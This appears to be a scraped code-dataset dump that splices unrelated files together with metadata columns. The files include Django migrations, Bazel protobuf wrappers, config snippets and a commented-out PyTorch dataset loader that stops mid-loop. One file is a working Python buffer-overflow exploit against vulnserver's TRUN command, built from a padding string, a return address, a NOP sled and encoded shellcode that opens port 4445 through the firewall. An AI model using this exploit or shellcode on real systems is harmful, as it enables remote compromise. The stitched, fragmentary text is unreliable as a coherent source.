| 16 | 31 | 0.84375 | 4 | 32 | 6.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 32 | 1 | 32 | 32 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b8b5ad4c039cfa4c2f665f679ae234c59cc10487 | 2,061 | py | Python | Laelia/apps/base/migrations/0006_auto_20201001_1731.py | arantesdv/LaeliaAppProject | 93fca5393cb8406694903d9adde02067480c792e | [
"MIT"
] | null | null | null | Laelia/apps/base/migrations/0006_auto_20201001_1731.py | arantesdv/LaeliaAppProject | 93fca5393cb8406694903d9adde02067480c792e | [
"MIT"
] | null | null | null | Laelia/apps/base/migrations/0006_auto_20201001_1731.py | arantesdv/LaeliaAppProject | 93fca5393cb8406694903d9adde02067480c792e | [
"MIT"
] | null | null | null | # Generated by Django 3.0.6 on 2020-10-01 17:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base', '0005_auto_20201001_1634'),
]
operations = [
migrations.AddField(
model_name='patient',
name='address',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Address'),
),
migrations.AddField(
model_name='patient',
name='main_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (main)'),
),
migrations.AddField(
model_name='patient',
name='neiborhood',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Neiborhood'),
),
migrations.AddField(
model_name='patient',
name='notes',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='patient',
name='other_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (other)'),
),
migrations.AddField(
model_name='professional',
name='address',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Address'),
),
migrations.AddField(
model_name='professional',
name='main_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (main)'),
),
migrations.AddField(
model_name='professional',
name='neiborhood',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Neiborhood'),
),
migrations.AddField(
model_name='professional',
name='other_phone',
field=models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone (other)'),
),
]
| 34.932203 | 103 | 0.583697 | 211 | 2,061 | 5.549763 | 0.232227 | 0.138343 | 0.176772 | 0.207515 | 0.838599 | 0.838599 | 0.695132 | 0.695132 | 0.695132 | 0.695132 | 0 | 0.034812 | 0.28918 | 2,061 | 58 | 104 | 35.534483 | 0.764505 | 0.021834 | 0 | 0.826923 | 1 | 0 | 0.136544 | 0.01142 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019231 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b24a8c999e3a0582f4bd37d888451058ae06ad93 | 187 | py | Python | app/user/resources.py | guidiego/pyground | 962ba01f5a18391b86d091176b056f0ba0431f04 | [
"MIT"
] | 1 | 2016-10-17T15:56:27.000Z | 2016-10-17T15:56:27.000Z | app/user/resources.py | guidiego/pyground | 962ba01f5a18391b86d091176b056f0ba0431f04 | [
"MIT"
] | null | null | null | app/user/resources.py | guidiego/pyground | 962ba01f5a18391b86d091176b056f0ba0431f04 | [
"MIT"
] | null | null | null | from utils.generic_resource import GenericResource
from user.models import User
from utils.generic_resource import router_build
user_routes = router_build(GenericResource(User), "user")
| 31.166667 | 57 | 0.850267 | 25 | 187 | 6.16 | 0.44 | 0.116883 | 0.207792 | 0.311688 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 187 | 5 | 58 | 37.4 | 0.905882 | 0 | 0 | 0 | 0 | 0 | 0.02139 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b25711a881b06349619f034bb0b4405f9aaf2eba | 231 | py | Python | paper_forms/conf.py | dldevinc/paper-forms | 6430382a2c369ef346e702d3644f23eba7bd8354 | [
"BSD-3-Clause"
] | 1 | 2021-05-12T06:50:44.000Z | 2021-05-12T06:50:44.000Z | paper_forms/conf.py | dldevinc/paper-forms | 6430382a2c369ef346e702d3644f23eba7bd8354 | [
"BSD-3-Clause"
] | null | null | null | paper_forms/conf.py | dldevinc/paper-forms | 6430382a2c369ef346e702d3644f23eba7bd8354 | [
"BSD-3-Clause"
] | null | null | null | from django.conf import settings
DEFAULT_COMPOSER = getattr(settings, "PAPER_FORMS_DEFAULT_COMPOSER", "paper_forms.composers.base.BaseComposer")
DEFAULT_FORM_RENDERER = getattr(settings, "PAPER_FORMS_DEFAULT_FORM_RENDERER", None)
| 46.2 | 111 | 0.848485 | 29 | 231 | 6.37931 | 0.551724 | 0.162162 | 0.216216 | 0.27027 | 0.345946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064935 | 231 | 4 | 112 | 57.75 | 0.856481 | 0 | 0 | 0 | 0 | 0 | 0.4329 | 0.4329 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b2958878e4ed3b91cf7c14255db618ab28317d50 | 1,570 | bzl | Python | github.com/gogo/protobuf/deps.bzl | mirandacong/rules_proto | b74e93b3a197401da858423d2758aaf4f38be4f9 | [
"Apache-2.0"
] | null | null | null | github.com/gogo/protobuf/deps.bzl | mirandacong/rules_proto | b74e93b3a197401da858423d2758aaf4f38be4f9 | [
"Apache-2.0"
] | null | null | null | github.com/gogo/protobuf/deps.bzl | mirandacong/rules_proto | b74e93b3a197401da858423d2758aaf4f38be4f9 | [
"Apache-2.0"
] | null | null | null | load("//:deps.bzl",
"io_bazel_rules_go",
)
# Same as rules_go as rules_go is already loading gogo protobuf
def gogo_proto_compile(**kwargs):
io_bazel_rules_go(**kwargs)
def gogo_grpc_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogo_proto_library(**kwargs):
gogo_proto_compile(**kwargs)
def gogo_grpc_library(**kwargs):
gogo_grpc_compile(**kwargs)
gogo_proto_library(**kwargs)
def gogotypes_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogotypes_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogotypes_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogotypes_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
def gogoslick_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogoslick_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogoslick_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogoslick_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
def gogofast_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogofast_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogofast_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogofast_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
def gogofaster_proto_compile(**kwargs):
gogo_proto_compile(**kwargs)
def gogofaster_grpc_compile(**kwargs):
gogo_grpc_compile(**kwargs)
def gogofaster_proto_library(**kwargs):
gogo_proto_library(**kwargs)
def gogofaster_grpc_library(**kwargs):
gogo_grpc_library(**kwargs)
| 22.112676 | 63 | 0.75414 | 204 | 1,570 | 5.372549 | 0.117647 | 0.249088 | 0.180657 | 0.140511 | 0.77281 | 0.74635 | 0.725365 | 0.57573 | 0 | 0 | 0 | 0 | 0.120382 | 1,570 | 70 | 64 | 22.428571 | 0.793628 | 0.038854 | 0 | 0.454545 | 0 | 0 | 0.01858 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | true | 0 | 0 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a23e117ffaa984577c6715bf73d510266debeb43 | 156 | py | Python | pyjswidgets/pyjamas/ui/FlashPanel.ie6.py | takipsizad/pyjs | 54db0ba6747aca744f9f3c3e985a17e913dfb951 | [
"ECL-2.0",
"Apache-2.0"
] | 739 | 2015-01-01T02:05:11.000Z | 2022-03-30T15:26:16.000Z | pyjswidgets/pyjamas/ui/FlashPanel.ie6.py | takipsizad/pyjs | 54db0ba6747aca744f9f3c3e985a17e913dfb951 | [
"ECL-2.0",
"Apache-2.0"
] | 33 | 2015-03-25T23:17:04.000Z | 2021-08-19T08:25:22.000Z | pyjswidgets/pyjamas/ui/FlashPanel.ie6.py | takipsizad/pyjs | 54db0ba6747aca744f9f3c3e985a17e913dfb951 | [
"ECL-2.0",
"Apache-2.0"
] | 167 | 2015-01-01T22:27:47.000Z | 2022-03-17T13:29:19.000Z | """
@license: Apache License Version 2.0
@copyright: 2009 Tobias Weber
@author: Tobias Weber
@contact: tobi-weber@gmx.de
"""
def browser():
return 'ie' | 17.333333 | 36 | 0.698718 | 22 | 156 | 4.954545 | 0.818182 | 0.201835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.153846 | 156 | 9 | 37 | 17.333333 | 0.780303 | 0.74359 | 0 | 0 | 0 | 0 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
a2597139c66ebffd2c6f35590322a282d4ab7671 | 2,055 | py | Python | winxp_sp3/trun/disable_firewall/registry_openport/trun_openport-registry_poc.py | danf42/vulnserver | 1b01aaa0f0b5706b5bc24c5f64d99dddcdcfe913 | [
"MIT"
] | null | null | null | winxp_sp3/trun/disable_firewall/registry_openport/trun_openport-registry_poc.py | danf42/vulnserver | 1b01aaa0f0b5706b5bc24c5f64d99dddcdcfe913 | [
"MIT"
] | null | null | null | winxp_sp3/trun/disable_firewall/registry_openport/trun_openport-registry_poc.py | danf42/vulnserver | 1b01aaa0f0b5706b5bc24c5f64d99dddcdcfe913 | [
"MIT"
] | null | null | null | import socket
import struct
print "\nTRUN Command - Open port 4445\n"
ip_addr = '192.168.199.130'
port = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip_addr, int(port)))
except Exception as e:
print "[-] Failed to connect to service %s" % e
else:
print "[+] Connected to server"
# Get banner response
data = s.recv(1024)
print(data)
# ./compile.sh firewall_4445
# perl -e 'print "<shellcode>"' > firewall_4445.bin
# cat firewall_4445.bin | msfvenom -b '\x00'
buf = (
"\xbe\x3e\x2c\xda\xe6\xda\xdc\xd9\x74\x24\xf4\x58\x29\xc9"
"\xb1\x42\x83\xc0\x04\x31\x70\x0f\x03\x70\x31\xce\x2f\xd7"
"\x9f\x87\x37\x91\x08\x19\x5b\xb2\x36\x19\xa4\xdb\x5f\x6a"
"\xd0\x1b\xf7\xf8\x6b\x40\x4b\x69\xe2\x28\x3c\x1b\x92\xb1"
"\x8d\xab\x07\x2a\x73\x2d\xa4\xc6\x1b\xf1\x73\x7b\xb4\x61"
"\x1a\xea\x26\x17\x8a\x88\xe6\xa5\x25\x39\x68\x2e\xdb\xcb"
"\x1c\xf2\x48\x58\xbd\x62\x03\xc9\x5e\x0a\xb3\x65\xcc\x9c"
"\x2c\x1e\x7e\x38\xc4\xbf\x16\xb1\x76\x06\x8f\x5d\xe2\xf2"
"\x2a\xec\x84\x9b\xc6\x71\x38\x34\x55\x01\x9e\x94\xf1\xa4"
"\x7d\x76\x64\x4f\xe3\x0a\x03\xeb\x8b\x99\x97\xa0\x23\x36"
"\x51\x2e\xd7\xa3\xf5\xec\x44\x49\x77\x65\x07\xc2\x12\x01"
"\xbf\x8a\xa8\x9b\x50\x3b\x3e\x28\xec\xd4\xd6\xa5\x80\x58"
"\x43\x2e\x20\xd0\xd7\xed\xc2\xb9\xbe\xa2\x46\xb7\xa2\x74"
"\xa7\x97\x75\x27\x4f\x27\x79\xc8\x8f\x07\x29\x86\xdd\xcf"
"\xcb\x26\xe2\x8f\x73\xc2\x0b\x52\xf4\xf4\x1c\x5c\x28\x58"
"\xf5\xa5\x98\x1e\x55\xb2\x14\x95\x61\x77\xdd\x37\xb8\xbe"
"\x8c\xdf\xde\x33\x5a\x20\x49\xd1\xc6\x1a\xfd\x71\x68\x3a"
"\x9f\xed\x1c\x86\x75\xd4\x99\x9e\xb3\x7c\x62\x0f\xac\x48"
"\x50\x9b\x19\x38\x79\xd2\xa1\x7a\x11\x0d\x22\x7b\xe1\x7c"
"\x72\x33\xb1\x2c\x8d\xf4\x89\x06\x9b\x26\x9e\x57\x8c\x26"
"\x57\x10\x3a\xb5\x4a\x17\xba\x95")
evil_buf = "TRUN /.:/"
evil_buf += 'A'*2003 + struct.pack("<I", 0x625011AF) + '\x90'*32 + buf
bytes_sent = s.send(evil_buf)
print "Sent %s bytes" % bytes_sent
finally:
s.close()
| 34.830508 | 75 | 0.648662 | 397 | 2,055 | 3.327456 | 0.602015 | 0.027252 | 0.02271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241826 | 0.13674 | 2,055 | 58 | 76 | 35.431034 | 0.502818 | 0.068613 | 0 | 0 | 0 | 0.47619 | 0.674175 | 0.603457 | 0 | 1 | 0.005238 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0.119048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a2621b4d1bfc9f2bb9223c69f40ff04bd74ea3d9 | 63 | py | Python | parallel_wavegan/models/__init__.py | mukeshv0/ParallelWaveGAN | 40fd282d0364c8d8711efed21d9689653d85b3a2 | [
"MIT"
] | 4 | 2020-01-10T06:26:50.000Z | 2022-03-22T23:40:03.000Z | parallel_wavegan/models/__init__.py | idcore/ParallelWaveGAN | 2908bc5bce95f903f27a015f172ffd1b20017560 | [
"MIT"
] | null | null | null | parallel_wavegan/models/__init__.py | idcore/ParallelWaveGAN | 2908bc5bce95f903f27a015f172ffd1b20017560 | [
"MIT"
] | null | null | null | from parallel_wavegan.models.parallel_wavegan import * # NOQA
| 31.5 | 62 | 0.825397 | 8 | 63 | 6.25 | 0.75 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 63 | 1 | 63 | 63 | 0.892857 | 0.063492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a299892ea61b1937f748a80fcb1f49c65d0dad27 | 57,547 | py | Python | data/dataset.py | XDUxyLi/SCEN-master | 43c3cc60fb20054bb55c0d9d9eb4e1f6082a1377 | [
"MIT"
] | null | null | null | data/dataset.py | XDUxyLi/SCEN-master | 43c3cc60fb20054bb55c0d9d9eb4e1f6082a1377 | [
"MIT"
] | null | null | null | data/dataset.py | XDUxyLi/SCEN-master | 43c3cc60fb20054bb55c0d9d9eb4e1f6082a1377 | [
"MIT"
] | null | null | null | # # #external libs
# import numpy as np
# from tqdm import tqdm
# from PIL import Image
# from PIL import ImageFilter
# import os
# import random
# from os.path import join as ospj
# from glob import glob
# #torch libs
# from torch.utils.data import Dataset
# import torch
# import torchvision.transforms as transforms
# #local libs
# from utils.utils import get_norm_values, chunks
# from models.image_extractor import get_image_extractor
# from itertools import product
# import math
#
# device = 'cuda' if torch.cuda.is_available() else 'cpu'
#
# class ImageLoader:
# def __init__(self, root):
# self.root_dir = root
#
# def __call__(self, img):
# img = Image.open(ospj(self.root_dir,img)).convert('RGB') #We don't want alpha
# return img
#
#
# def dataset_transform(phase, norm_family = 'imagenet'):
# '''
# Inputs
# phase: String controlling which set of transforms to use
# norm_family: String controlling which normaliztion values to use
#
# Returns
# transform: A list of pytorch transforms
# '''
# mean, std = get_norm_values(norm_family=norm_family)
#
# if phase == 'train':
# transform = transforms.Compose([
# transforms.RandomResizedCrop(224),
# transforms.RandomHorizontalFlip(),
# transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
#
# elif phase == 'val' or phase == 'test':
# transform = transforms.Compose([
# transforms.Resize(256),
# transforms.CenterCrop(224),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
# elif phase == 'all':
# transform = transforms.Compose([
# transforms.Resize(256),
# transforms.CenterCrop(224),
# transforms.ToTensor(),
# transforms.Normalize(mean, std)
# ])
# else:
# raise ValueError('Invalid transform')
#
# return transform
#
# def filter_data(all_data, pairs_gt, topk = 5):
# '''
# Helper function to clean data
# '''
# valid_files = []
# with open('/home/ubuntu/workspace/top'+str(topk)+'.txt') as f:
# for line in f:
# valid_files.append(line.strip())
#
# data, pairs, attr, obj = [], [], [], []
# for current in all_data:
# if current[0] in valid_files:
# data.append(current)
# pairs.append((current[1],current[2]))
# attr.append(current[1])
# obj.append(current[2])
#
# counter = 0
# for current in pairs_gt:
# if current in pairs:
# counter+=1
# print('Matches ', counter, ' out of ', len(pairs_gt))
# print('Samples ', len(data), ' out of ', len(all_data))
# return data, sorted(list(set(pairs))), sorted(list(set(attr))), sorted(list(set(obj)))
#
# # Dataset class now
#
# class GaussianBlur(object):
# def __init__(self, sigma=[.1, 2.]):
# self.sigma = sigma
#
# def __call__(self, x):
# sigma = random.uniform(self.sigma[0], self.sigma[1])
# x = x.filter(ImageFilter.GaussianBlur(radius=sigma))
# return x
#
# class CompositionDataset(Dataset):
# '''
# Inputs
# root: String of base dir of dataset
# phase: String train, val, test
# split: String dataset split
# subset: Boolean if true uses a subset of train at each epoch
# num_negs: Int, numbers of negative pairs per batch
# pair_dropout: Percentage of pairs to leave in current epoch
# '''
# def __init__(
# self,
# root,
# phase,
# split = 'compositional-split',
# model = 'resnet18',
# norm_family = 'imagenet',
# subset = False,
# num_negs = 1,
# pair_dropout = 0.0,
# update_features = False,
# return_images = False,
# train_only = False,
# open_world=False
# ):
# self.root = root
# self.phase = phase
# self.split = split
# self.num_negs = num_negs
# self.pair_dropout = pair_dropout
# self.norm_family = norm_family
# self.return_images = return_images
# self.update_features = update_features
# self.feat_dim = 512 if 'resnet18' in model else 2048 # todo, unify this with models
# self.open_world = open_world
#
# self.attrs, self.objs, self.pairs, self.train_pairs, \
# self.val_pairs, self.test_pairs = self.parse_split()
# self.train_data, self.val_data, self.test_data = self.get_split_info()
# self.full_pairs = list(product(self.attrs,self.objs))
#
# # Clean only was here
# self.obj2idx = {obj: idx for idx, obj in enumerate(self.objs)}
# self.attr2idx = {attr : idx for idx, attr in enumerate(self.attrs)}
# if self.open_world:
# self.pairs = self.full_pairs
#
# self.all_pair2idx = {pair: idx for idx, pair in enumerate(self.pairs)}
#
# if train_only and self.phase == 'train':
# print('Using only train pairs')
# self.pair2idx = {pair : idx for idx, pair in enumerate(self.train_pairs)}
# else:
# print('Using all pairs')
# self.pair2idx = {pair : idx for idx, pair in enumerate(self.pairs)}
#
# if self.phase == 'train':
# self.data = self.train_data
# elif self.phase == 'val':
# self.data = self.val_data
# elif self.phase == 'test':
# self.data = self.test_data
# elif self.phase == 'all':
# print('Using all data')
# self.data = self.train_data + self.val_data + self.test_data
# else:
# raise ValueError('Invalid training phase')
#
# self.all_data = self.train_data + self.val_data + self.test_data
# print('Dataset loaded')
# print('Train pairs: {}, Validation pairs: {}, Test Pairs: {}'.format(
# len(self.train_pairs), len(self.val_pairs), len(self.test_pairs)))
# print('Train images: {}, Validation images: {}, Test images: {}'.format(
# len(self.train_data), len(self.val_data), len(self.test_data)))
#
# if subset:
# ind = np.arange(len(self.data))
# ind = ind[::len(ind) // 1000]
# self.data = [self.data[i] for i in ind]
#
#
# # Keeping a list of all pairs that occur with each object
# self.obj_affordance = {}
# self.train_obj_affordance = {}
# for _obj in self.objs:
# candidates = [attr for (_, attr, obj) in self.train_data+self.test_data if obj==_obj]
# self.obj_affordance[_obj] = list(set(candidates))
#
# candidates = [attr for (_, attr, obj) in self.train_data if obj==_obj]
# self.train_obj_affordance[_obj] = list(set(candidates))
#
# self.sample_indices = list(range(len(self.data)))
# self.sample_pairs = self.train_pairs
#
# # Load based on what to output
# self.transform = dataset_transform(self.phase, self.norm_family)
# self.loader = ImageLoader(ospj(self.root, 'images'))
# if not self.update_features:
# feat_file = ospj(root, model+'_featurers.t7')
# print(f'Using {model} and feature file {feat_file}')
# if not os.path.exists(feat_file):
# with torch.no_grad():
# self.generate_features(feat_file, model)
# self.phase = phase
# activation_data = torch.load(feat_file)
# self.activations = dict(
# zip(activation_data['files'], activation_data['features']))
# self.feat_dim = activation_data['features'].size(1)
# print('{} activations loaded'.format(len(self.activations)))
#
#
# def parse_split(self):
# '''
# Helper function to read splits of object atrribute pair
# Returns
# all_attrs: List of all attributes
# all_objs: List of all objects
# all_pairs: List of all combination of attrs and objs
# tr_pairs: List of train pairs of attrs and objs
# vl_pairs: List of validation pairs of attrs and objs
# ts_pairs: List of test pairs of attrs and objs
# '''
# def parse_pairs(pair_list):
# '''
# Helper function to parse each phase to object attrribute vectors
# Inputs
# pair_list: path to textfile
# '''
# with open(pair_list, 'r') as f:
# pairs = f.read().strip().split('\n')
# pairs = [line.split() for line in pairs]
# pairs = list(map(tuple, pairs))
#
# attrs, objs = zip(*pairs)
# return attrs, objs, pairs
#
# tr_attrs, tr_objs, tr_pairs = parse_pairs(
# ospj(self.root, self.split, 'train_pairs.txt')
# )
# vl_attrs, vl_objs, vl_pairs = parse_pairs(
# ospj(self.root, self.split, 'val_pairs.txt')
# )
# ts_attrs, ts_objs, ts_pairs = parse_pairs(
# ospj(self.root, self.split, 'test_pairs.txt')
# )
#
# #now we compose all objs, attrs and pairs
# all_attrs, all_objs = sorted(
# list(set(tr_attrs + vl_attrs + ts_attrs))), sorted(
# list(set(tr_objs + vl_objs + ts_objs)))
# all_pairs = sorted(list(set(tr_pairs + vl_pairs + ts_pairs)))
#
# return all_attrs, all_objs, all_pairs, tr_pairs, vl_pairs, ts_pairs
#
# def get_split_info(self):
# '''
# Helper method to read image, attrs, objs samples
#
# Returns
# train_data, val_data, test_data: List of tuple of image, attrs, obj
# '''
# data = torch.load(ospj(self.root, 'metadata_{}.t7'.format(self.split)))
#
# train_data, val_data, test_data = [], [], []
#
# for instance in data:
# image, attr, obj, settype = instance['image'], instance['attr'], \
# instance['obj'], instance['set']
# curr_data = [image, attr, obj]
#
# if attr == 'NA' or (attr, obj) not in self.pairs or settype == 'NA':
# # Skip incomplete pairs, unknown pairs and unknown set
# continue
#
# if settype == 'train':
# train_data.append(curr_data)
# elif settype == 'val':
# val_data.append(curr_data)
# else:
# test_data.append(curr_data)
#
# return train_data, val_data, test_data
#
# def get_dict_data(self, data, pairs):
# data_dict = {}
# for current in pairs:
# data_dict[current] = []
#
# for current in data:
# image, attr, obj = current
# data_dict[(attr, obj)].append(image)
#
# return data_dict
#
#
# def reset_dropout(self):
# '''
# Helper function to sample new subset of data containing a subset of pairs of objs and attrs
# '''
# self.sample_indices = list(range(len(self.data)))
# self.sample_pairs = self.train_pairs
#
# # Using sampling from random instead of 2 step numpy
# n_pairs = int((1 - self.pair_dropout) * len(self.train_pairs))
#
# self.sample_pairs = random.sample(self.train_pairs, n_pairs)
# print('Sampled new subset')
# print('Using {} pairs out of {} pairs right now'.format(
# n_pairs, len(self.train_pairs)))
#
# self.sample_indices = [ i for i in range(len(self.data))
# if (self.data[i][1], self.data[i][2]) in self.sample_pairs
# ]
# print('Using {} images out of {} images right now'.format(
# len(self.sample_indices), len(self.data)))
#
# def sample_negative(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Returns
# Tuple of a different attribute, object indexes
# '''
# new_attr, new_obj = self.sample_pairs[np.random.choice(
# len(self.sample_pairs))]
#
# while new_attr == attr and new_obj == obj:
# new_attr, new_obj = self.sample_pairs[np.random.choice(
# len(self.sample_pairs))]
#
# return (self.attr2idx[new_attr], self.obj2idx[new_obj])
#
# def sample_affordance(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Return
# Idx of a different attribute for the same object
# '''
# new_attr = np.random.choice(self.obj_affordance[obj])
#
# while new_attr == attr:
# new_attr = np.random.choice(self.obj_affordance[obj])
#
# return self.attr2idx[new_attr]
#
# def sample_train_affordance(self, attr, obj):
# '''
# Inputs
# attr: String of valid attribute
# obj: String of valid object
# Return
# Idx of a different attribute for the same object from the training pairs
# '''
# new_attr = np.random.choice(self.train_obj_affordance[obj])
#
# while new_attr == attr:
# new_attr = np.random.choice(self.train_obj_affordance[obj])
#
# return self.attr2idx[new_attr]
#
# def generate_features(self, out_file, model):
# '''
# Inputs
# out_file: Path to save features
# model: String of extraction model
# '''
# # data = self.all_data
# data = ospj(self.root,'images')
# files_before = glob(ospj(data, '**', '*.jpg'), recursive=True)
# files_all = []
# for current in files_before:
# parts = current.split('/')
# if "cgqa" in self.root:
# files_all.append(parts[-1])
# else:
# files_all.append(os.path.join(parts[-2],parts[-1]))
# transform = dataset_transform('test', self.norm_family)
# feat_extractor = get_image_extractor(arch = model).eval()
# feat_extractor = feat_extractor.to(device)
#
# image_feats = []
# image_files = []
# for chunk in tqdm(
# chunks(files_all, 512), total=len(files_all) // 512, desc=f'Extracting features {model}'):
#
# files = chunk
# imgs = list(map(self.loader, files))
# imgs = list(map(transform, imgs))
# feats = feat_extractor(torch.stack(imgs, 0).to(device))
# image_feats.append(feats.data.cpu())
# image_files += files
# image_feats = torch.cat(image_feats, 0)
# print('features for %d images generated' % (len(image_files)))
#
# torch.save({'features': image_feats, 'files': image_files}, out_file)
#
#
#
#
# def __getitem__(self, index):
# '''
# Call for getting samples
# '''
# index = self.sample_indices[index]
#
# image, attr, obj = self.data[index]
#
# # Decide what to output
# if not self.update_features:
# img = self.activations[image]
# else:
# img = self.loader(image)
# img = self.transform(img)
#
#
# data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
# # data = [img, self.attr2idx[attr], self.obj2idx[obj], self.pair2idx[(attr, obj)]]
#
# if self.phase == 'train':
#
# img_pos_obj = [_img for (_img, _, _obj) in self.train_data if _obj == obj]
# img_pos_att = [_img for (_img, _att, _) in self.train_data if _att == attr]
# img_pos = [_img for (_img, _att, _obj) in self.train_data if _obj == obj and _att == attr]
#
# for i in range(len(img_pos)):
# img_pos[i] = self.activations[img_pos[i]]
# if len(img_pos) >= 1:
# img_pos_feats = random.sample(img_pos, 1)
# else:
# img_pos_feats = []
# img_pos_feats.append(img_pos)
#
# for i in range(len(img_pos_obj)):
# img_pos_obj[i] = self.activations[img_pos_obj[i]]
# if len(img_pos_obj) > 10:
# img_pos_obj_feats = random.sample(img_pos_obj, 10)
# else:
# if len(img_pos_obj) != 0:
# img_pos_obj_feats = []
# while len(img_pos_obj_feats) < 10:
# for i in range(len(img_pos_obj)):
# img_pos_obj_feats.append(img_pos_obj[i])
# if len(img_pos_obj_feats) == 10:
# break
# # img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
# else:
# img_pos_obj_feats = torch.Tensor(10, len(img_pos_att[0]))
#
#
# for i in range(len(img_pos_att)):
# img_pos_att[i] = self.activations[img_pos_att[i]]
# if len(img_pos_att) > 10:
# img_pos_att_feats = random.sample(img_pos_att, 10)
# else:
# if len(img_pos_obj) != 0:
# img_pos_obj_feats = []
# while len(img_pos_obj_feats) < 10:
# for i in range(len(img_pos_obj)):
# img_pos_obj_feats.append(img_pos_obj[i])
# if len(img_pos_obj_feats) == 10:
# break
